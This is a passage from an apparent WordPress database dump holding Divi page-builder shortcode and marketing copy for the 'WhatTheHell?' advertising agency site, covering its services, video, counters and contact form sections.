animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 19:23:40','2020-08-04 19:23:40','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(418,1,'2020-08-04 19:27:44','2020-08-04 19:27:44','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" 